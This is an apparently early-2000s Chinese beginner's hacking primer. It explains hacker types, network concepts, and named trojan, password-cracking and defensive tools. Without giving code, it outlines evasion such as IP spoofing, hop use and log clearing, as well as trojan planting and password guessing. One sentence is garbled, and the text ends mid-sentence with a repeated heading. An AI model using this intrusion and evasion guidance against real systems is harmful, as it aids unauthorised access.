菜 鸟 变 黑 客 终 极 教 程

广陵寒

一.黑客的分类和行为

以我的理解，“黑客”大体上应该分为“正”、“邪”两类，正派黑客依*自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善，而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情，因为邪派黑客所从事的事情违背了《黑客守则》，所以他们真正的名字叫“骇客”（Cracker）而非“黑客”（Hacker），也就是我们平时经常听说的“黑客”（Cacker）和“红客”（Hacker）。

无论那类黑客，他们最初的学习内容都将是本部分所涉及的内容，而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路，但是所做的事情也差不多，只不过出发点和目的不一样而已。

很多人曾经饰遥骸白龊诳推绞倍甲鍪裁矗渴遣皇非常刺激？”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识，黑客平时需要用大量的时间学习，我不知道这个过程有没有终点，只知道“多多益善”。由于学习黑客完全出于个人爱好，所以无所谓“无聊”；重复是不可避免的，因为“熟能生巧”，只有经过不断的联系、实践，才可能自己体会出一些只可意会、不可言传的心得?

在学习之余，黑客应该将自己所掌握的知识应用到实际当中，无论是哪种黑客做出来的事情，根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种：

一、学习技术

互联网上的新技术一旦出现，黑客就必须立刻学习，并用最短的时间掌握这项技术，这里所说的掌握并不是一般的了解，而是阅读有关的“协议”（rfc）、深入了解此技术的机理，否则一旦停止学习，那么依*他以前掌握的内容，并不能维持他的“黑客身份”超过一年。
初级黑客要学习的知识是比较困难的，因为他们没有基础，所以学习起来要接触非常多的基本内容，然而今天的互联网给读者带来了很多的信息，这就需要初级学习者进行选择：太深的内容可能会给学习带来困难；太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多，应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。

二、伪装自己：

黑客的一举一动都会被服务器记录下来，所以黑客必须伪装自己使得对方无法辨别其真实身份，这需要有熟练的技巧，用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的，这对于初学者来说成的上“大成境界”了，也就是说初学者不可能用短时间学会伪装，所以我并不鼓励初学者利用自己学习的知识对网络进行攻击，否则一旦自己的行迹败露，最终害的害是自己。
如果有朝一**成为了真正的黑客，我也同样不赞成你对网络进行攻击，毕竟黑客的成长是一种学习，而不是一种犯罪。

三、发现漏洞：

漏洞对黑客来说是最重要的信息，黑客要经常学习别人发现的漏洞，并努力自己寻找未知漏洞，并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验，当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
黑客对寻找漏洞的执著是常人难以想象的，他们的口号说“打破权威”，从一次又一次的黑客实践中，黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中，所谓的“天衣无缝”不过是“没有找到”而已。

四、利用漏洞：

对于正派黑客来说，漏洞要被修补；对于邪派黑客来说，漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”，黑客利用漏洞可以做下面的事情：
1、获得系统信息：有些漏洞可以泄漏系统信息，暴露敏感资料，从而进一步入侵系统；
2、入侵系统：通过漏洞进入系统内部，或取得服务器上的内部资料、或完全掌管服务器；
3、寻找下一个目标：一个胜利意味着下一个目标的出现，黑客应该充分利用自己已经掌管的服务器作为工具，寻找并入侵下一个系统；
4、做一些好事：正派黑客在完成上面的工作后，就会修复漏洞或者通知系统管理员，做出一些维护网络安全的事情；
5、做一些坏事：邪派黑客在完成上面的工作后，会判断服务器是否还有利用价值。如果有利用价值，他们会在服务器上植入木马或者后门，便于下一次来访；而对没有利用价值的服务器他们决不留情，系统崩溃会让他们感到无限的快感！

==================================================

二.黑客应掌握的基本技能

从这一节开始，我们就真正踏上学习黑客的道路了，首先要介绍的是作为一名初级黑客所必须掌握的基本技能，学习这可以通过这一节的阅读了解到黑客并不神秘，而且学习起来很容易上手。为了保证初学者对黑客的兴趣，所以本书采取了循环式进度，也就是说每一章节的内容都是独立、全面的，学习者只有完整的学习过一章的内容，才能够进而学习下一章的内容。

一、了解一定量的英文：

学习英文对于黑客来说非常重要，因为现在大多数资料和教程都是英文版本，而且有关黑客的新闻也是从国外过来的，一个漏洞从发现到出现中文介绍，需要大约一个星期的时间，在这段时间内网络管理员就已经有足够的时间修补漏洞了，所以当我们看到中文介绍的时候，这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。

二、学会基本软件的使用：

这里所说的基本软件是指两个内容：一个是我们日常使用的各种电脑常用命令，例如ftp、ping、net等；另一方面还要学会有关黑客工具的使用，这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多，功能各不相同，所以本书在后面将会介绍几款流行的软件使用方法，学习者在掌握其基本原理以后，既可以选择适合自己的，也可以在“第二部分”中找到有关软件的开发指南，编写自己的黑客工具。

三、初步了解网络协议和工作原理：

所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理，因为协议涉及的知识多且复杂，所以如果在一开始就进行深入研究，势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议，尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容，此部分内容将会在后面的章节中进行具体介绍。

四、熟悉几种流行的编程语言和脚本：

同上面所述一样，这里也不要求学习者进行深入学习，只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言，另外对于htm超文本语言和php、java等做基本了解，主要学习这些语言中的“变量”和“数组”部分，因为语言之间存在内在联系，所以只要熟练掌握其中一们，其他语言也可以一脉相同，建议学习C语言和htm超文本语言。

五、熟悉网络应用程序：

网络应用程序包括各种服务器软件后台程序，例如：wuftp、Apache等服务器后台；还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器，然后安装并运行一些论坛代码，经过一番尝试之后，将会感性的弄清楚网络工作原理，这比依*理论学习要容易许多，能够达到事半功倍的效果！

==================================================

网络安全术语解释

一、协议：

网络是一个信息交换的场所，所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换，这种物理设备包括最常见的电缆、光缆、无线WAP和微波等，但是单纯拥有这些物理设备并不能实现信息的交换，这就好像人类的身体不能缺少大脑的支配一样，信息交换还要具备软件环境，这种“软件环境”是人类实现规定好的一些规则，被称作“协议”，有了协议，不同的电脑可以遵照相同的协议使用物理设备，并且不会造成相互之间的“不理解”。

这种协议很类似于“摩尔斯电码”，简单的一点一横，经过排列可以有万般变化，但是假如没有“对照表”，谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样，它们通过各种预先规定的协议完成不同的使命，例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员，都必须通过学习协议达到了解网络运作机理的目的。

每一个协议都是经过多年修改延续使用至今的，新产生的协议也大多是在基层协议基础上建立的，因而协议相对来说具有较高的安全机制，黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议，因为出现时间短、考虑欠周到，也可能会因安全问题而被黑客利用。

对于网络协议的讨论，更多人则认为：现今使用的基层协议在设计之初就存在安全隐患，因而无论网络进行什么样的改动，只要现今这种网络体系不进行根本变革，从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围，因而不在这里详细介绍。

二、服务器与客户端：

最简单的网络服务形式是：若干台电脑做为客户端，使用一台电脑当作服务器，每一个客户端都具有向服务器提出请求的能力，而后由服务器应答并完成请求的动作，最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式，它不需要服务器的支持，而是直接将两个客户端电脑进行连接，也就是说每一台电脑都既是服务器、又是客户端，它们之间具有相同的功能，对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。

从此看出，客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户，都是操作着自己的电脑（客户端），别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的，而对于黑客来说则是通过自己的电脑（客户端）对其他电脑（有可能是客户端，也有可能是服务器）进行攻击，以达到入侵、破坏、窃取信息的目的。

三、系统与系统环境：

电脑要运作必须安装操作系统，如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等，这些操作系统各自独立运行，它们有自己的文件管理、内存管理、进程管理等机制，在网络上，这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作，它们之间通过“协议”来完成信息的交换工作。
不同的操作系统配合不同的应用程序就构成了系统环境，例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器，其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息；再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器，通过远程ftp登陆可以获得系统上的各种文件资源等。

四、IP地址和端口：

我们上网，可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目，都是通过不同的协议完成的，然而网络如此之大，我们的电脑怎么能够找到服务项目所需要的电脑？如何在一台电脑上同时完成如此多的工作的呢？这里就要介绍到IP地址了。
每一台上网的电脑都具有独一无二的IP地址，这个地址类似于生活中人们的家庭地址，通过网络路由器等多种物理设备（无需初级学习者理解），网络可以完成从一个电脑到另一个电脑之间的信息交换工作，因为他们的IP地址不同，所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址，这样当服务器接受到黑客电脑（伪IP地址）的请求后，服务器会将应答信息传送到伪IP地址上，从而造成网络的混乱。当然，黑客也可以根据IP地址轻易的找到任何上网者或服务器，进而对他们进行攻击（想想现实中的入室抢劫），因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。
接下来我解释一下上面提到的第二个问题：一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样，不同的协议体现在不同的网络服务上，而不同的网络服务则会在客户端电脑上开辟不同的端口（城门）来完成它的信息传送工作。当然，如果一台网络服务器同时开放了多种网络服务，那么它也要开放多个不同的端口（城门）来接纳不同的客户端请求。

网络上经常听到的“后门”就是这个意思，黑客通过特殊机能在服务器上开辟了一个网络服务，这个服务可以用来专门完成黑客的目的，那么服务器上就会被打开一个新的端口来完成这种服务，因为这个端口是供黑客使用的，因而轻易不会被一般上网用户和网络管理员发现，即“隐藏的端口”，故“后门”。

每一台电脑都可以打开65535个端口，因而理论上我们可以开发出至少65535种不同的网络服务，然而实际上这个数字非常大，网络经常用到的服务协议不过几十个，例如浏览网页客户端和服务端都使用的是80号端口，进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。

五、漏洞：

漏洞就是程序中没有考虑到的情况，例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号；Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段，“溢出”漏洞则属于当初设计系统或者程序的时候，没有预先保留出足够的资源，而在日后使用程序是造成的资源不足；特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等……

总而言之，漏洞就是程序设计上的人为疏忽，这在任何程序中都无法绝对避免，黑客也正是利用种种漏洞对网络进行攻击的，本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果，其实真正对黑客的定义就是“寻找漏洞的人”，他们并不是以网络攻击为乐趣，而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说，从某种程度上讲，黑客都是“好人”，他们为了追求完善、建立安全的互联网才投身此行的，只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞，近些年人们才对黑客有了畏惧和敌视的心理。

六、加密与解密：

在“协议”的讲解中，我提到了“由于网络设计的基层存在问题……”，简单的说这一问题是允许所有上网者参与信息共享，因而对某些商业、个人隐私在网络上的传送，就会暴露在众目睽睽之下，我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到，如何才能让这些信息安全呢？读者也许想到了“二战中”的间谍战：参战国家在使用电报的时候，都对代码进行了加密处理，只有知道了“密码薄”的接收者，才可以进行译码工作。正是这种古老的加密方式，在现代化的网络上也依然存在它旺盛的生命力，通过加密处理的信息在网络上传送，无论谁拿到了这份文件，只要没有“密码薄”仍然是白费力气的。
网络上最长使用的是设置个人密码、使用DES加密锁，这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作，而黑客所要进行的工作，就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文，有人把“魔高一尺、道高一仗”用在这里，的确是在恰当不过了！网络上的加密方法和需要验证密码的系统层出不穷，黑客也在寻找破解这些系统的种种办法。

可以说，“漏洞”和“解密”是两个完全不同的黑客领域，对于不同的学习者对他们的偏好，将会直接影响到今后将会成为的黑客类型，因而在二者之间的选择，应根据个人喜好进行，本书将会侧重学习“漏洞”方面的知识。

七、特洛伊木马：

特洛伊木马是一个程序，这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作，不论是否用户了解，都是不被赞同的。根据某些人的认识，病毒是特洛伊木马的一个特例，即：能够传播到其他的程序当中（也就是将这些程序也变成特洛伊木马）。根据另外的人的理解，不是有意造成任何损坏的病毒不是特洛伊木马。最终，不论如何定义，许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序，以便将特洛伊木马与病毒区分开。

==================================================

四.常用黑客软件性质分类

一、扫描类软件：

扫描是黑客的眼睛，通过扫描程序，黑客可以找到攻击目标的IP地址、开放的端口号、服务器运行的版本、程序中可能存在的漏洞等。因而根据不同的扫描目的，扫描类软件又分为地址扫描器、端口扫描器、漏洞扫描器三个类别。在很多人看来，这些扫描器获得的信息大多数都是没有用处的，然而在黑客看来，扫描器好比黑客的眼睛，它可以让黑客清楚的了解目标，有经验的黑客则可以将目标“摸得一清二楚”，这对于攻击来说是至关重要的。同时扫描器也是网络管理员的得力助手，网络管理员可以通过它既是了解自己系统的运行状态和可能存在的漏洞，在黑客“下手”之前将系统中的隐患清除，保证服务器的安全稳定。

现在网络上很多扫描器在功能上都设计的非常强大，并且综合了各种扫描需要，将各种功能集成于一身。这对于初学网络安全的学习者来说无疑是个福音，因为只要学习者手中具备一款优秀的扫描器，就可以将信息收集工作轻松完成，免去了很多繁琐的工作。但是对于一个高级黑客来说，这些现成的工具是远远不能胜任的，他们使用的程序大多自己编写开发，这样在功能上将会完全符合个人意图，而且可以针对新漏洞既是对扫描器进行修改，在第一时间获得最宝贵的目标资料。本书此部分将会介绍扫描器的具体使用方法，而在第二部分中则会具体讲述如何开发这些扫描器，请读者务必循序渐进，否则将会给自己的学习带来很多不必要的烦恼。

二、远程监控类软件：

远程监控也叫做“木马”，这种程序实际上是在服务器上运行一个客户端软件，而在黑客的电脑中运行一个服务端软件，如此一来，服务器将会变成黑客的服务器的“手下”，也就是说黑客将会利用木马程序在服务器上开一个端口，通过这种特殊的木马功能对服务器进行监视、控制。因此，只要学习者掌握了某个木马的使用和操作方法，就可以轻易接管网络服务器或者其他上网者的电脑。

在控制了服务器之后，黑客的攻击行动也就接近尾声了，然而在做这件事情之前，黑客必须想办法让服务器运行自己木马的那个“客户端程序”，这就需要利用漏洞或者进行欺骗。欺骗最简单，就是想办法让操作服务器的人（系统管理员之类）运行黑客的客户端程序，而利用漏洞则要初学者阅读完本书后面的内容才能够做到了。

三、病毒和蠕虫：

首先声明一下：编写病毒的做法并不属于黑客。病毒只不过是一种可以隐藏、复制、传播自己的程序，这种程序通常具有破坏作用，虽然病毒可以对互联网造成威胁，然而它并没有试图寻找程序中的漏洞，所以制作病毒还有病毒本身对黑客的学习都没有实际意义。

之所以提到病毒，是因为蠕虫和病毒有很多相似性，如虫也是一段程序，和病毒一样具有隐藏、复制、船舶自己的功能。不同的是蠕虫程序通常会寻找特定的系统，利用其中的漏洞完成传播自己和破坏系统的作用，另外蠕虫程序可以将收到攻击的系统中的资料传送到黑客手中，这要看蠕虫设计者的意图，因而蠕虫是介于木马和病毒之间的一类程序。

计算机蠕虫是自包含的程序(或是一套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。蠕虫的制造需要精深的网络知识，还要具备高超的编程水平，对于一个初学黑客的学习者来说，蠕虫的制造和使用都是非常难理解的，并且大多数蠕虫攻击的对象是Linux系统，而本书所使用的学习平台是Windows 95/98或Windows NT/2000，因而我同样建议初学者不要过多的涉及这部分内容，有关此部分内容也将会在《攻学兼防》的第二部分中有所介绍。

四、系统攻击和密码破解：

这类软件大多数都是由高级黑客编写出来的，供初级黑客使用的现成软件，软件本身不需要使用者具备太多的知识，使用者只要按照软件的说明操作就可以达到软件的预期目的，因而这类软件不具备学习黑客知识的功效。不过这类软件对于黑客很重要，因为它可以大幅度减小黑客的某些繁琐工作，使用者经过对软件的设置就可以让软件自动完成重复的工作，或者由软件完成大量的猜测工作，充分利用剩余时间继续学习网络知识。

系统攻击类软件主要分为信息炸弹和破坏炸弹。网络上常见的垃圾电子邮件就是这种软件的“杰作”，还有聊天室中经常看到的“踢人”、“骂人”类软件、论坛的垃圾灌水器、系统蓝屏炸弹也都属于此类软件的变异形式。如果学习者能够认真学习黑客知识，最终可以自己编写类似的工具，但如果某个人天天局限于应用此类软件上，他将永远是一个“伪黑客”。
密码破解类软件和上面的软件一样，完全依*它将对学习黑客毫无帮助。对于真正的黑客来说，这种软件可以帮助寻找系统登陆密码，相对于利用漏洞，暴力破解密码要简单许多，但是效率会非常低，但是真正的黑客无论是使用密码破解软件还是利用漏洞进入系统之后，都达到了自己入侵的目的，因此对于如何进入系统，对于某些溺爱系统攻击的黑客来说无关紧要。值得一提的是：真正执著于漏洞分析的黑客是从来不使用这种软件的，而我向来将分析漏洞作为至高无上的工作，所以也尽量不去接触此类软件。

五、监听类软件：

通过监听，黑客可以截获网络的信息包，之后对加密的信息包进行破解，进而分析包内的数据，获得有关系统的信息；也可能截获个人上网的信息包，分析的到上网账号、系统账号、电子邮件账号等个人隐私资料。监听类软件最大的特点在于它是一个亦正亦邪的，因为网络数据大多经过加密，所以用它来获得密码比较艰难，因而在更多的情况下，这类软件是提供给程序开发者或者网络管理员的，他们利用这类软件进行程序的调试或服务器的管理工作。

==================================================

广陵寒

五.常用黑客软件用途分类

一、防范：

这是从安全的角度出发涉及的一类软件，例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私，不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的，如日志分析软件、系统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。

二、信息搜集：

信息搜集软件种类比较多，包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件；还有监听、截获信息包等间谍类软件，其大多数属于亦正亦邪的软件，也就是说无论正派黑客、邪派黑客、系统管理员还是一般的电脑使用者，都可以使用者类软件完成各自不同的目的。在大多数情况下，黑客使用者类软件的频率更高，因为他们需要依*此类软件对服务器进行全方位的扫描，获得尽可能多的关于服务器的信息，在对服务器有了充分的了解之后，才能进行黑客动作。

三、木马与蠕虫：

这是两种类型的软件，不过他们的工作原理大致相同，都具有病毒的隐藏性和破坏性，另外此类软件还可以由拥有控制权的人进行操作，或由事先精心设计的程序完成一定的工作。当然这类软件也可以被系统管理员利用，当作远程管理服务器的工具。

四、洪水：

所谓“洪水”即信息垃圾炸弹，通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃，近年来网络上又开始流行DOS分散式攻击，简单地说也可以将其归入此类软件中。洪水软件还可以用作邮件炸弹或者聊天式炸弹，这些都是经过简化并由网络安全爱好者程序化的“傻瓜式”软件，也就是本书一开始指责的“伪黑客”手中经常使用的软件。

五、密码破解：

网络安全得以保证的最实用方法是依*各种加密算法的密码系统，黑客也许可以很容易获得一份暗文密码文件，但是如果没有加密算法，它仍然无法获得真正的密码，因此使用密码破解类软件势在必行，利用电脑的高速计算能力，此类软件可以用密码字典或者穷举等方式还原经过加密的暗文。

六、欺骗：

如果希望获得上面提到的明文密码，黑客需要对暗文进行加密算法还原，但如果是一个复杂的密码，破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型，是不是更加方便？欺骗类软件就是为了完成这个目的而设计的。

七、伪装：

网络上进行的各种操作都会被ISP、服务器记录下来，如果没有经过很好的伪装就进行黑客动作，很容易就会被反跟踪技术追查到黑客的所在，所以伪装自己的IP地址、身份是黑客非常重要的一节必修课，但是伪装技术需要高深的网络知识，一开始没有坚实的基础就要用到这一类软件了。



==================================================

学习黑客的基本环境

一、操作系统的选择：

我们经常听说黑客酷爱Linux系统，这是因为Linux相对Windows提供了更加灵活的操作方式，更加强大的功能。例如对于IP地址的伪造工作，利用Linux系统编写特殊的IP头信息可以轻松完成，然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面，这个系统的命令庞杂、操作复杂，并不适合初学者使用，而且对于个人学习者，并没有过多的人会放弃“舒适”的Windows、放弃精彩的电脑游戏和便捷的操作方式，去全心投入黑客学习中。而且对于初学黑客的学习者来说，大多数网络知识都可以在Windows系统中学习，相对Linux系统，Windows平台下的黑客软件也并不在少数，另外通过安装程序包，Windows系统中也可以调试一定量的程序，因此初步学习黑客没有必要从Linux入手。

本书使用的平台WindowsME，因为对于个人用户来说，NT或者2000多少有些苛刻——系统配置要求太高；然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容测试漏洞，从远程服务器出发，所以也不是非要WindowsME操作系统进行学习，对于少数系统版本之间的差异，学习者可以和我联系获得相应系统的学习方法。

二、需要的常用软件：

除了基本的操作系统以外，学习者还需要安装各类扫描器，之后下载一个比较优秀的木马软件、一个监听类软件，除此以外别无它求。如果有必要，读者可以自行安装本文上述软件，然后学习其用法，但是我要告诉你，对于各类炸弹、还有网络上各式各样的黑客软件，在学习完本书后，你都可以自己制作、自己开发，根本没有必要使用他人编写的软件。
对于扫描器和监听软件，我给出以下建议，并且在本书的后面还会对这几个软件进行详细介绍：

扫描器：

监听软件：

木马：

三、额外的工具：

如果可以安装下面的工具，将会对学习黑客有莫大的帮助，当然下面的软件主要是学习额外内容并为“第二部分”学习作铺垫用的，所以没有也不会妨碍本书的学习。

1、后台服务器：

拥有某些网络应用的后台服务程序，可以将自己的电脑设置成一个小型服务器，用来学习相应的网络应用，从“内部”了解其运作机理，这将会大大提高自己对服务器的感性认识，同时还能够在激活服务器的时候；监测自己服务器上的数据，如果有其他黑客来攻击，则可以清晰的记录下对方的攻击过程，从而学习到更多的黑客攻击方法。对于本书而言，主要介绍网站的Perl和asp等脚本语言漏洞，所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl，使自己的服务器具备编译cgi和pl脚本的能力。使用自己的服务器还有一个好处，可以节省大量的上网时间，将学习、寻找漏洞的过程放到自己的电脑上，既节省了金钱、有不会对网络构成威胁，一举两得。

2、C语言编译平台：

今后在学习黑客的路途中，将会遇到很多“属于自己的问题”，这些问题网络上的其他人可能不会注意，所以无法找到相应的程序，这个时候学习者就要自己动手开发有关的工具了，所以安装一个Borland C++将会非常便捷，通过这个编译器，学习者既可以学习C语言，也能够修改本书后面列出的一些小程序，打造一个属于自己的工具库。

四、网络安全软件分类

现在我们来了解一下有关网络安全软件的分类，因为学习黑客知识是两个相互联系的过程：既学习如何黑，还要学会如何防止被黑。

1、防火墙：

这是网络上最常见的安全机制软件，防火墙有硬件的、也有软件的，大多数读者看到的可能更多都是软件防火墙。其功能主要是过滤垃圾信息（保证系统不会受到炸弹攻击）、防止蠕虫入侵、防止黑客入侵、增加系统隐私性（对敏感数据进行保护）、实时监控系统资源，防止系统崩溃、定期维护数据库，备份主要信息……防火墙可以将系统本身的漏洞修补上，让黑客没有下手的机会。另外对于拥有局域网的企业来说，防火墙可以限制系统端口的开放，禁止某些网络服务（杜绝木马）。

2、检测软件：

互联网上有专门针对某个黑客程序进行清除的工具，但是这类软件更多是集成在杀毒软件或者防火墙软件内的，对于系统内的木马、蠕虫可以进行检测并清除，软件为了保护系统不受侵害，会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放状态等。如果用户需要，软件还可以编写有关的脚本对指定端口进行屏蔽（防火墙一样具备此功能）。

3、备份工具：

专门用来备份数据的工具可以帮助服务器定期备份数据，并在制定时间更新数据，这样即便黑客破坏了服务器上的数据库，软件也可以在短时间内完全修复收到入侵的数据。另外对于个人用户，这类软件可以对硬盘进行完全映像备份，一旦系统崩溃，用户利用这类软件可以将系统恢复到原始状态，例如Ghost就是这类软件中的佼佼者。

4、日志纪录、分析工具：

对于服务器来说，日志文件是必不可少的，管理员可以通过日志了解服务器的请求类型和请求来源，并且根据日志判断系统是否受到黑客攻击。通过日志分析软件，管理员可以轻松的对入侵黑客进行反追踪，找到黑客的攻击来源，进而抓不黑客。这也就是为什么黑客在攻击的时候多采用IP地址伪装、服务器跳转，并在入侵服务器之后清除日志文件的原因。

==================================================
网络流行黑客软件简介
（因主要教大家防御而不是攻击，因此暂时不提供相关的软件下载，需要研究的朋友可以去网络搜索。稍后将有软件的详细使用说明）

一、国产经典软件简介（先介绍写老软件，但其在国产黑客业内有举足轻重的作用。）

溯雪

密码探测器：利用溯雪可以轻松的完成基于web形式的各种密码猜测工作，例如email、forum中的注册用户密码等。软件采取多线程编写，除了支持字典和穷举以外，软件最大的特色是可以自己编写猜测规则，例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文件，最大程度上保证了猜测的准确性。

乱刀

密码破解：乱刀可以破解unix系统中的密码暗文，对于取得了etc/passwd文件的黑客来说这是必不可少的。

天网

防火墙软件：中国第一套通过公安部认证的软硬件集成防火墙，能有效的防止黑客入侵，抵御来自外部网络的攻击，保证内部系统的资料不被盗取，它根据系统管理者设定的安全规则把守企业网络，提供强大的访问控制、身份认证、应用选通、网络地址转换、信息过滤、虚拟专网、流量控制、虚拟网桥等功能。

冰河

木马类软件：国内响当当的木马软件，知名度绝不亚于BO，主要用于远程监控。自动跟踪屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文件及注册表、远程关机、发送信息等多种监控功能。此软件的一大特色是可以由使用者自己设置需要占用的端口，如此一来监控类软件就很难从端口号上直接判断系统是否存在冰河了。

小分析家

监测类软件：免费网络协议分析工具，这个工具的特点是界面简单实用，与国外的一些sniffer产品相比，如Netxray，结果更为直观。此软件为免费版本，只能运行在NT系统下，同时编写此软件的公司还提供了软件的商业版本“网警”。

快速搜索

端口扫描器：快速搜索是一个在网络上搜索服务器的软件，可以根据给定的地址和端口号查找机器。具有多线程同时搜索技术，可以将搜索速度提高到单线程的十倍以上。
其他：针对2000/XP扫描的D-TOOLS等。

二、常见网络安全软件简介

Local Port Scanner

本地端口扫描器：通过这个软件可以监测本地电脑被打开的端口。此软件可以监测大多数黑客入侵或者木马占用的端口，它有五种不同的扫描方式并可以获得有关端口的详细扫描信息。

A-spy

系统进程察看器：A-spy可以监测Windows系统启动过程中调用的所有程序、执行的进程，并将结果保存在日志文件中。这个软件的用途是检察系统是否被安置了木马程序，同时软件还可以对系统启动需要调用的程序进行增加、删除和编辑等操作，改变调用程序之间的先后顺序，软件支持包括NT、2000在内的所有Windows平台，具有17种方式清楚木马程序。

Netmon

图形化Netstat命令：Netmon是图形化的Netstat命令，它运行在Windows系统中，可以察看系统的TCP、UDP连接状态，同时此软件提供了一份完整的木马、蠕虫占用端口清单，可以快速了解系统是否存在安全问题。

LANguard Network Scanner

局域网资料收集器：LANguard允许使用者扫描局域网内部的搜索电脑，搜集他们的netbios信息、打开端口、共享情况和其他相关资料，这些资料及可以被黑客利用进行攻击，也可以被管理员利用进行安全维护，通过它可以强行关闭指定端口和共享目录。

Leechsoft's NetMonitor

TCP/IP状态分析程序：这个软件使用于系统安全管理员、网络程序开发员、一般的拥护。此工具可以显示电脑在上网状态下存在的TCP/IP连接，同时还能分析是否有其他人正在监视上网者电脑中的某个端口，同时此工具内部还有一个功能强大的端口扫描程序。

Win Trinoo Server Sniper

清除Win.Trinoo Server程序：Win.Trinoo是一个类似DOS攻击的木马程序，被植入它的电脑将变成一台Win.Trinoo Server，黑客通过这个Server能够“借刀杀人”攻击其他电脑系统。Win Trinoo Server Sniper可以高速的监测电脑是否存在此问题。

SubSeven Server Sniper

清除SubSeven Server程序：同上面的工具一样，SubSeven也是一个木马程序，而SubSeven Server Sniper则是用来检测并清除SubSeven而设计的。不同的是，这个软件不但可以清楚SubSeven，而且还能搜集攻击者在您电脑中留下的蛛丝马迹，找到攻击者的ICQ号码、email地址等内容，从而为反跟踪提供了详尽的信息。

Attacker

端口监听程序：这是一个TCP/UDP端口监听程序，它可以常驻系统并在危险端口打开的时候发出警告信息，保证个人上网隐私的安全性。

ICEWatch

BlackICE插件：这个插件可以完善BlackICE的结果列表，让列表更加详尽，同时该插件还提供了更好的结果分类查询功能，并且可以对结果进行复制、编辑等操作。另外此插件为BlackICE提供了声音，可以设置软件使用过程中的提醒、警告的音效。

Isecure IP Scanner

netbios共享扫描器：黑客利用netbios的共享可以进入存在问题的电脑并对硬盘进行操作，同时还可以获得入侵电脑上的隐私资料。这个扫描器就是专门为防止此类事件发生开发的，运行软件会自动扫描目标并报告有关资料。

AnalogX Port Blocker

端口屏蔽程序：当使用者的电脑上开放某个端口的时候，任何人都可以通过其开放端口访问相应资源，而AnalogX Port Blocker可以屏蔽某个端口，或者设置特殊IP地址禁止对指定端口的请求，这从一定程度上方便了程序调试人员为在本地系统上从事软件的测试工作。

Tambu Dummy Server

端口屏蔽程序：这个工具同上面一个程序的功能是一样的，不过不同的是，这个工具是

广陵寒

四.常用黑客软件性质分类

一、扫描类软件：

